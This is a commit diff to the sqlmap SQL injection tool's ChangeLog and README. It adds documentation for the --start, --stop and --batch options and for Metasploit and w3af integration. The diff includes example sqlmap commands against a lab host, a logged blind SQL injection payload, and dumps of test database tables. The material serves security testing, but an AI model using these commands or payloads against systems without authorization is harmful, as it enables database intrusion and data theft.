sqlmapproject
diff --git a/‎doc/ChangeLog‎
Lines changed: 4 additions & 1 deletion b/‎doc/ChangeLog‎
Lines changed: 4 additions & 1 deletion
diff --git a/‎doc/README.html‎
Lines changed: 139 additions & 49 deletions b/‎doc/README.html‎
Lines changed: 139 additions & 49 deletions
diff --git a/‎doc/README.pdf‎
3.66 KB b/‎doc/README.pdf‎
3.66 KB
@@ -2,7 +2,7 @@ sqlmap (0.6.1-1) stable; urgency=low
 
   * Major bug fix to blind SQL injection bisection algorithm to handle an
     exception;
-  * Added a Metasploit 3 auxiliary module to run sqlmap;
+  * Added a Metasploit Framework 3 auxiliary module to run sqlmap;
   * Implemented possibility to test for and inject also on LIKE
     statements;
   * Implemented --start and --stop options to set the first and the last
@@ -12,6 +12,9 @@ sqlmap (0.6.1-1) stable; urgency=low
   * Minor enhancement to save also the length of query output in the
     session file when retrieving the query output length for ETA or for
     resume purposes;
+  * Changed the order sqlmap dump table entries from column by column to
+    row by row. Now it also dumps entries as they are stored in the tables,
+    not forcing the entries' order alphabetically anymore;
   * Minor bug fix to correctly handle parameters' value with % character.
 
  -- Bernardo Damele A. G. <[email protected]>  Fri,  10 Oct 2008 10:00:00 +0100
 
@@ -245,8 +245,8 @@ <H2><A NAME="s2">2.</A> <A HREF="#toc2">Features</A></H2>
 On the dynamic ones sqlmap automatically tests and detects the ones
 affected by SQL injection. Each dynamic parameter is tested for
 <EM>numeric</EM>, <EM>single quoted string</EM>, <EM>double quoted
-string</EM> and all of these three datatypes with zero, one and two
-parenthesis to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
+string</EM> and all of these three datatypes with zero to two parenthesis
+to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
 perform further injections with. It is also possible to specify the
 parameter(s) that you want to perform tests and use for injection on.</LI>
 <LI>Option to specify the <B>maximum number of concurrent HTTP
@@ -277,6 +277,9 @@ <H2><A NAME="s2">2.</A> <A HREF="#toc2">Features</A></H2>
 <LI>Support to read options from a configuration INI file rather than
 specify each time all of the options on the command line. Support also to
 save command line options on a configuration INI file.</LI>
+<LI>Integration with other IT security related open source projects,
+<A HREF="http://metasploit.com/framework/">Metasploit</A> and 
+<A HREF="http://w3af.sourceforge.net/">w3af</A>.</LI>
 <LI><B>PHP setting <CODE>magic_quotes_gpc</CODE> bypass</B> by encoding
 every query string, between single quotes, with <CODE>CHAR</CODE>, or similar,
 database management system function.</LI>
@@ -292,19 +295,19 @@ <H2><A NAME="s3">3.</A> <A HREF="#toc3">Download and update</A></H2>
 <P>
 <UL>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.zip">Source zip compressed</A> operating system independent.</LI>
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.zip">Source zip compressed</A> operating system independent.</LI>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
 other Debian derivated GNU/Linux distribution.</LI>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
 other operating system that can install RPM packages.</LI>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
 interpreter</B> to be installed on the operating system.</LI>
 </UL>
 </P>
@@ -331,7 +334,7 @@ <H2><A NAME="s5">5.</A> <A HREF="#toc5">Usage</A></H2>
 <PRE>
 $ python sqlmap.py -h
 
-    sqlmap/0.6.1.1 coded by Bernardo Damele A. G. &lt;[email protected]>
+    sqlmap/0.6.1 coded by Bernardo Damele A. G. &lt;[email protected]>
                         and Daniele Bellucci &lt;[email protected]>
 
 Usage: sqlmap.py [options] {-u &lt;URL> | -g &lt;google dork> | -c &lt;config file>}
@@ -379,13 +382,16 @@ <H2><A NAME="s5">5.</A> <A HREF="#toc5">Usage</A></H2>
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables (opt: -D)
     --columns           Enumerate DBMS database table columns (req: -T, -D)
-    --dump              Dump DBMS database table entries (req: -T, -D opt: -C)
+    --dump              Dump DBMS database table entries (req: -T, -D opt: -C,
+                        --start, --stop)
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
     -C COL              DBMS database table column to enumerate
     -U USER             DBMS user to enumerate
     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
+    --start=LIMITSTART  First table entry to dump
+    --stop=LIMITSTOP    Last table entry to dump
     --sql-query=QUERY   SQL SELECT query to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
@@ -417,6 +423,7 @@ <H2><A NAME="s5">5.</A> <A HREF="#toc5">Usage</A></H2>
     -s SESSIONFILE      Save and resume all data retrieved on a session file
     -c CONFIGFILE       Load options from a configuration INI file
     --save              Save options on a configuration INI file
+    --batch             Never ask for user input, use the default behaviour
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
@@ -528,7 +535,7 @@ <H3>Target URL and verbosity</H3>
 [hh:mm:28] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:29] [INFO] testing MySQL
@@ -537,7 +544,7 @@ <H3>Target URL and verbosity</H3>
 GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 </PRE>
@@ -555,7 +562,7 @@ <H3>Target URL and verbosity</H3>
 [hh:mm:32] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
@@ -573,7 +580,7 @@ <H3>Target URL and verbosity</H3>
 GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
@@ -600,7 +607,7 @@ <H3>Target URL and verbosity</H3>
 [hh:mm:23] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2042,7 +2049,8 @@ <H3>Database table columns</H3>
 
 <H3>Dump database tables entries</H3>
 
-<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE> and <CODE>-D</CODE></P>
+<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
+<CODE>--start</CODE> and <CODE>--stop</CODE></P>
 
 <P>It is possible to dump the entries for a specific database table.
 This functionality depends on both <CODE>-T</CODE> to specify the table name
@@ -2058,15 +2066,15 @@ <H3>Dump database tables entries</H3>
 Database: test
 Table: users
 [5 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
-| 1  | luther                                     | blissett          |
-| 2  | fluffy                                     | bunny             |
-| 3  | wu                                         | ming              |
++----+----------------------------------------------+-------------------+
+| id | name                                         | surname           |
++----+----------------------------------------------+-------------------+
+| 1  | luther                                       | blissett          |
+| 2  | fluffy                                       | bunny             |
+| 3  | wu                                           | ming              |
 | 4  | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
-| 5  | NULL                                       | nameisnull        |
-+----+--------------------------------------------+-------------------+
+| 5  | NULL                                         | nameisnull        |
++----+----------------------------------------------+-------------------+
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
@@ -2112,15 +2120,15 @@ <H3>Dump database tables entries</H3>
 Database: public
 Table: users
 [5 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
-| 1  | luther                                     | blissett          |
-| 2  | fluffy                                     | bunny             |
-| 3  | wu                                         | ming              |
++----+----------------------------------------------+-------------------+
+| id | name                                         | surname           |
++----+----------------------------------------------+-------------------+
+| 1  | luther                                       | blissett          |
+| 2  | fluffy                                       | bunny             |
+| 3  | wu                                           | ming              |
 | 4  | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
-| 5  |                                            | nameisnull        |
-+----+--------------------------------------------+-------------------+
+| 5  |                                              | nameisnull        |
++----+----------------------------------------------+-------------------+
 
 [hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
 192.168.1.121/dump/public/users.csv'
@@ -2138,6 +2146,40 @@ <H3>Dump database tables entries</H3>
 </CODE></BLOCKQUOTE>
 </P>
 
+<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE> option
+to limit the dump to a range of entries.</P>
+<P>
+<UL>
+<LI><CODE>--start</CODE> specifies the first entry to enumerate</LI>
+<LI><CODE>--stop</CODE> specifies the last entry to enumerate</LI>
+</UL>
+</P>
+
+<P>Example on a <B>MySQL 5.0.51</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" --dump \
+  -T users -D test --start 2 --stop 4
+
+Database: test
+Table: users
+[3 entries]
++----+----------------------------------------------+-------------------+
+| id | name                                         | surname           |
++----+----------------------------------------------+-------------------+
+| 2  | fluffy                                       | bunny             |
+| 3  | wu                                           | ming              |
+| 4  | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
++----+----------------------------------------------+-------------------+
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>As you can see, sqlmap is very flexible: you can leave it automatically
+enumerate the whole database table up to a single column of a specific
+table entry.</P>
+
 
 <H3>Dump all databases tables entries</H3>
 
@@ -2153,15 +2195,15 @@ <H3>Dump all databases tables entries</H3>
 Database: test
 Table: users
 [5 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
-| 1  | luther                                     | blissett          |
-| 2  | fluffy                                     | bunny             |
-| 3  | wu                                         | ming              |
++----+----------------------------------------------+-------------------+
+| id | name                                         | surname           |
++----+----------------------------------------------+-------------------+
+| 1  | luther                                       | blissett          |
+| 2  | fluffy                                       | bunny             |
+| 3  | wu                                           | ming              |
 | 4  | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
-| 5  | NULL                                       | nameisnull        |
-+----+--------------------------------------------+-------------------+
+| 5  | NULL                                         | nameisnull        |
++----+----------------------------------------------+-------------------+
 
 Database: information_schema
 Table: CHARACTER_SETS
@@ -2246,15 +2288,15 @@ <H3>Dump all databases tables entries</H3>
 Database: master
 Table: users
 [5 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
++----+----------------------------------------------+-------------------+
+| id | name                                         | surname           |
++----+----------------------------------------------+-------------------+
 | 4  | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
-| 2  | fluffy                                     | bunny             |
-| 1  | luther                                     | blisset           |
-| 3  | wu                                         | ming              |
-| 5  | NULL                                       | nameisnull        |
-+----+--------------------------------------------+-------------------+
+| 2  | fluffy                                       | bunny             |
+| 1  | luther                                       | blisset           |
+| 3  | wu                                           | ming              |
+| 5  | NULL                                         | nameisnull        |
++----+----------------------------------------------+-------------------+
 
 [...]
 </PRE>
@@ -3123,7 +3165,8 @@ <H3>Save options on a configuration INI file</H3>
 
 <P>Option: <CODE>--save</CODE></P>
 
-
+<P>It is possible to save the command line options to a configuration INI
+file.</P>
 
 <P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
 <P>
@@ -3231,6 +3274,53 @@ <H3>Save options on a configuration INI file</H3>
 </P>
 
 
+<H3>Act in non-interactive mode</H3>
+
+<P>Option: <CODE>--batch</CODE></P>
+
+<P>If you want sqlmap to run as a batch tool, without interacting with you in
+case of a choice has to be done, you can force it by using <CODE>--batch</CODE>
+option than letting sqlmap go for a default behaviour.</P>
+
+<P>Example on a <B>MySQL 5.0.51</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&amp;name=luther" -v 1 \
+  --batch
+
+[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
+[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
+[hh:mm:22] [INFO] GET parameter 'id' is dynamic
+[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
+[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
+[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
+[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
+[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
+[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
+[hh:mm:22] [INFO] GET parameter 'name' is dynamic
+[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
+[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
+[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
+[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
+[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
+[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
+[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
+[0] place: GET, parameter: id, type: numeric (default)
+[1] place: GET, parameter: name, type: stringsingle
+[q] Quit
+Choice: 0
+[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
+[...]
+back-end DBMS:  MySQL >= 5.0.0
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>As you can see, sqlmap choosed automatically to injection on the first
+vulnerable parameter which is the default behaviour.</P>
+
+
 <H2><A NAME="s6">6.</A> <A HREF="#toc6">Disclaimer</A></H2>
 
 <P>sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY